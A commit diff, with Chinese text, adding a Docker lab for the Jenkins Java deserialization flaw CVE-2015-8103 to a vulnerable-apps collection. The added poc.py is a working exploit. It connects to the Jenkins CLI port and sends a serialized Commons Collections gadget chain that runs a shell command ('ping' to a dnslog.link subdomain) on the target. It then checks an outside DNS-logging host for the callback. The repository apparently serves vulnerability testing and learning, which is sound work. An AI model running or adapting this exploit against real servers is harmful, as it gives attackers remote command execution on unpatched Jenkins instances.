添加 Jenkins 「Java 反序列化」过程远程命令执行漏洞

CVE-2015-8103

Author: Medicean

README.md

@@ -55,6 +55,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 * [B](#b)
 * [C](#c)
 * [I](#i)
+* [J](#j)
 * [O](#o)
 * [S](#s)
 * [W](#w)
@@ -74,6 +75,10 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 
 * [ImageMagick](./i/imagemagick/)
 
+### [J](./j/)<div id="j"></div>
+
+* [Jenkins](./j/jenkins/)
+
 ### [O](./o/)<div id="o"></div>
 
 * [OpenSSL](./o/openssl/)

j/README.md

@@ -0,0 +1,3 @@
+# J
+
+* [Jenkins](./jenkins/)

j/jenkins/1/Dockerfile

@@ -0,0 +1 @@
+FROM jenkins:1.566

j/jenkins/1/README.md

@@ -0,0 +1,64 @@
+## Jenkins 「Java 反序列化」过程远程命令执行漏洞(CVE-2015-8103)
+
+### 说明
+
+ FoxGlove 安全研究团队于2015年11月06日在其博客上公开了一篇关于常见 Java 应用如何利用反序列化操作进行远程命令执行的文章。文中提到了2015年1月 AppSec2015 上一个关于各语言序列化操作利用议题《Marshalling Pickles》，其中介绍了 Ruby、Python、PHP 和 Java 中反序列化操作的危害，详细说明了 Java 中如何使用 Apache Commons Collections 这个常用库来构造 POP 链（类ROP链）来进行任意命令执行，并且提供了相应的 Payload 生成工具 – ysoserial。
+
+ 原博文所提到的 WebSphere，WebLogic，JBoss，Jenkins 和 OpenNMS 等 Java 应用都使用了 `Apache Commons Collections` 这个库，并且都存在一个序列化对象数据交互接口能够被访问到。针对每个应用，博文都提供了相应的分析和验证代码来说明 Java 应用存在远程命令执行的普遍性。
+
+### 漏洞信息
+
+ * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)
+ * [Jenkins “Java 反序列化”过程远程命令执行漏洞](https://www.seebug.org/vuldb/ssvid-89725)
+ * [FoxGlovesec JavaUnserializeExploits](https://github.com/foxglovesec/JavaUnserializeExploits)
+ * [Java反序列化漏洞执行命令回显实现及Exploit下载](http://www.freebuf.com/sectool/88908.html)
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:j_jenkins_1
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8080:8080 -p 50000:50000 medicean/vulapps:j_jenkins_1
+ ```
+ > 8080 为 Jenkins web 管理端口
+ >
+ > 50000 为 Jenkins SLAVE AGENT 端口
+
+ 访问 `http://你的 IP 地址:8080/`，看到 Jenkins Web 管理界面即代表启动成功
+
+### 使用与利用
+
+#### PoC
+
+控制台下执行：
+
+```
+$ python poc.py http://127.0.0.1:8080/
+```
+
+> 参数为 Jenkins 的 Web 地址
+
+如果看到如下结果则表示存在该漏洞：
+
+```
+[+] Send request to find CLI listener port from response headers
+[+] Found CLI listener port: "50000"
+[+] Connecting CLI listener 127.0.0.1:50000
+[+] Sending handshake headers
+[+] Sending payload...
+[+] Check result...
+[+] http://127.0.0.1:8080/ is Vulnerable
+```
+
+> 由于该命令执行无回显，使用的是 DNSLog 的方式来将无回显的命令执行转为有回显，可能会因为网络访问问题造成误漏报。
+
+#### Exp
+
+ * [FoxGlovesec JavaUnserializeExploits](https://github.com/foxglovesec/JavaUnserializeExploits)
+ * [Java反序列化漏洞执行命令回显实现及Exploit下载](http://www.freebuf.com/sectool/88908.html)

j/jenkins/1/poc.py

@@ -0,0 +1,56 @@
+#!/usr/bin/env python
+# coding: utf-8
+
+import sys
+import base64
+import socket
+import urlparse
+import requests
+import hashlib
+import time
+
+if len(sys.argv) < 2:
+    print('Usage: python %s <jenkins_web_url>' % sys.argv[0])
+    sys.exit()
+
+jenkins_web_url = sys.argv[1]
+flag = hashlib.md5(str(time.time())).hexdigest()[:16]
+i_headers = {
+    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
+}
+print('[+] Send request to find CLI listener port from response headers')
+response = requests.get(jenkins_web_url, headers=i_headers)
+cli_port = int(response.headers['X-Jenkins-CLI-Port'])
+print('[+] Found CLI listener port: "%s"' % cli_port)
+
+sock_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = urlparse.urlparse(jenkins_web_url).netloc
+try:
+    host, port = host.split(':')
+except:
+    host = host
+cli_listener = (socket.gethostbyname(host), cli_port)
+print('[+] Connecting CLI listener %s:%s' % cli_listener)
+sock_fd.connect(cli_listener)
+
+print('[+] Sending handshake headers')
+headers = '\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
+sock_fd.send(headers)
+sock_fd.recv(1024)
+sock_fd.recv(1024)
+
+payload_obj = "aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5472616e73666f726d65644d617061773fe05df15a700300024c000e6b65795472616e73666f726d657274002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b4c001076616c75655472616e73666f726d657271007e00057870707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001900000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00197371007e00117571007e001600000002707571007e001600000000740006696e766f6b657571007e001900000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00167371007e00117571007e001600000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007870000000037400072f62696e2f73687400022d6374002b70696e67202d63203320623662623032656437333161653866322e746573742e646e736c6f672e6c696e6b740004657865637571007e0019000000017671007e002a737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c7708000000100000000174000576616c756574000d646f65732774206d617474657278787672001b6a6176612e6c616e672e616e6e6f746174696f6e2e54617267657400000000000000000000007870".decode('hex').replace("b6bb02ed731ae8f2", flag)
+payload_obj_b64 = base64.b64encode(payload_obj)
+payload = '\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'
+payload += payload_obj_b64
+payload += '00000000112daced00057372001b687564736f6e2e72656d6f74696e672e557365725265717565737400000000000000010200034c0010636c6173734c6f6164657250726f78797400304c687564736f6e2f72656d6f74696e672f52656d6f7465436c6173734c6f616465722449436c6173734c6f616465723b5b0007726571756573747400025b424c0008746f537472696e677400124c6a6176612f6c616e672f537472696e673b78720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b78720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b78707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00035b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd223902000078700000000c7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00034c000866696c654e616d6571007e00034c000a6d6574686f644e616d6571007e0003787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e00130000003c74001b687564736f6e2e72656d6f74696e672e557365725265717565737474001055736572526571756573742e6a61766171007e00177371007e001300000308740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174000463616c6c7371007e0013000000fa740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657274001c52656d6f7465496e766f636174696f6e48616e646c65722e6a617661740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e771007e002071007e002174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002d71007e002e7400055f6d61696e7371007e00130000018671007e002d71007e002e7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e003c7871007e0008000000010000000070737d00000002002e687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f61646572001c687564736f6e2e72656d6f74696e672e49526561645265736f6c7665787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b787073720027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657200000000000000010300055a00146175746f556e6578706f7274427943616c6c65725a0009676f696e67486f6d654900036f69645a00097573657250726f78794c00066f726967696e71007e000d7870000000000002007371007e000b71007e004374007850726f787920687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572403220776173206372656174656420666f7220696e7465726661636520687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f616465727571007e00110000000d7371007e00130000007d71007e002471007e002571007e00177371007e00130000008971007e002471007e0025740004777261707371007e00130000026a71007e002071007e00217400066578706f72747371007e0013000002a6740021687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f6164657274001652656d6f7465436c6173734c6f616465722e6a61766171007e004a7371007e00130000004671007e001d71007e001e71007e00177371007e00130000030871007e002071007e002171007e00227371007e0013000000fa71007e002471007e002571007e00267371007e0013ffffffff71007e00287071007e00297371007e0013000004e771007e002071007e002171007e002b7371007e00130000009371007e002d71007e002e71007e00177371007e00130000004871007e003071007e003171007e00327371007e0013000001df71007e002d71007e002e71007e00347371007e00130000018671007e002d71007e002e71007e003671007e003a7878757200025b42acf317f8060854e0020000787000000746aced000573720032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737400000000000000010200044900036f69645b0009617267756d656e74737400135b4c6a6176612f6c616e672f4f626a6563743b4c000a6d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000574797065737400135b4c6a6176612f6c616e672f537472696e673b7708fffffffe0000000278720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b77040000000078720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b77040000000078707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b770400000000787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc40200007704fffffffd787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00025b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b7704fffffffd787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007704fffffffd78700000000b7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00024c000866696c654e616d6571007e00024c000a6d6574686f644e616d6571007e00027704fffffffd787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e001300000239740032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737474001c52656d6f7465496e766f636174696f6e48616e646c65722e6a61766171007e00177371007e0013000000f6740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657271007e001e740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e7740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002a71007e002b7400055f6d61696e7371007e00130000018671007e002a71007e002b7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7704fffffffd7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7704fffffffd7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657704fffffffd7870000000007704000000007871007e00397871007e000800000000000000007000000001757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007704fffffffd787000000001740018687564736f6e2e636c692e436c69456e747279506f696e7471007e0024757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007704fffffffd7870000000017400106a6176612e6c616e672e4f626a65637474001d5250435265717565737428312c77616974466f7250726f706572747929'.decode('hex')
+
+print('[+] Sending payload...')
+sock_fd.send(payload)
+print('[+] Check result...')
+time.sleep(6)
+resp = requests.get("http://admin.dnslog.link/api/dns/test/%s/" % (flag))
+if "True" in resp.content:
+    print('[+] %s is Vulnerable' % jenkins_web_url)
+else:
+    print('[-] Not Vulnerable')

j/jenkins/README.md

@@ -0,0 +1,3 @@
+# Jenkins VulApps
+
+* [Jenkins 「Java 反序列化」过程远程命令执行漏洞(CVE-2015-8103)](./1/)